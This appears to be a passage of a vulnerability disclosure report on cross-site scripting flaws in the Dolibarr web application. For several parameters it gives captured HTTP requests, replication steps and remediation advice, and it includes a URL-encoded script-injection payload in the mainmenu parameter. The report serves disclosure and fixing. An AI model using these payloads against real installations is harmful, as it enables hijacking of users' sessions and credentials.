Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=88791">d1066&username=test&password=123qwe%2C.%2F + +Affected parameter(s): dol_use_jmobile + +Steps to replicate: +21. Open Dolibarr application in browser. +22. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +23. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +24. Manipulate dol_use_jmobile parameter value with payload 88791">d1066 and submit the request and see the output in browser +25. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon + +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the mainmenu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e was submitted in the mainmenu parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. + +HTTP request: +GET /dolibarr/index.php?mainmenu=home%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&leftmenu=&optioncss=print HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost:8082/dolibarr/index.php?mainmenu=home&leftmenu= +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive + +Affected parameter(s): mainmenu + + + + + +Steps to replicate: +26. Open Dolibarr application in browser. +27. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +28. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +29. Manipulate mainmenu parameter value with payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e +or submit http://localhost/dolibarr/index.php?mainmenu=home%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&leftmenu=&optioncss=print in address bar and see the output in browser +30. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +? +Vulnerability Name: Cross-site scripting (Stored) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bea68">13228 was submitted in the email parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + +bea68">13228 +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): email + +Steps to replicate: +1. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +2. Click on modify to modify the user details +3. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +4. After starting tamper data addon, click on save to save the user details and intercept the request +5. Manipulate email parameter value with payload bea68">13228 and submit the request and see the output in browser +6. This input was echoed unmodified in the application's response that is the proof of vulnerability + + +Screenshot: + + Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +Vulnerability Name: Cross-site scripting (Stored) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the firstname request parameter is copied into the HTML document as plain text between tags. The payload 60b01f17dd was submitted in the firstname parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test160b01f17dd +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): firstname + +Steps to replicate: +7. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +8. Click on modify to modify the user details +9. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +10. After starting tamper data addon, click on save to save the user details and intercept the request +11. Manipulate firstname parameter value with payload test160b01f17dd and submit the request and see the output in browser +12. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +Vulnerability Name: Cross-site scripting (Stored) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the job request parameter is copied into the HTML document as plain text between tags. The payload 5db8ea0840 was submitted in the job parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + 5db8ea0840 +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): firstname + +Steps to replicate: +13. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +14. Click on modify to modify the user details +15. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +16. After starting tamper data addon, click on save to save the user details and intercept the request +17. Manipulate job parameter value with payload 5db8ea0840 and submit the request and see the output in browser +18. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +Vulnerability Name: Cross-site scripting (Stored) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the lastname request parameter is copied into the HTML document as plain text between tags. The payload fc1ddbaf03 was submitted in the lastname parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +testfc1ddbaf03 +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): lastname + +Steps to replicate: +19. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +20. Click on modify to modify the user details +21. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +22. After starting tamper data addon, click on save to save the user details and intercept the request +23. Manipulate lastname parameter value with payload fc1ddbaf03 and submit the request and see the output in browser +24. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the login request parameter is copied into the HTML document as plain text between tags. The payload 99ecb45a0d was submitted in the login parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test99ecb45a0d +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): login + +Steps to replicate: +25. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +26. Click on modify to modify the user details +27. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +28. After starting tamper data addon, click on save to save the user details and intercept the request +29. Manipulate login parameter value with payload 99ecb45a0d and submit the request and see the output in browser +30. User logout inadequately and attack input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the leftmenu request parameter is copied into a JavaScript string which is 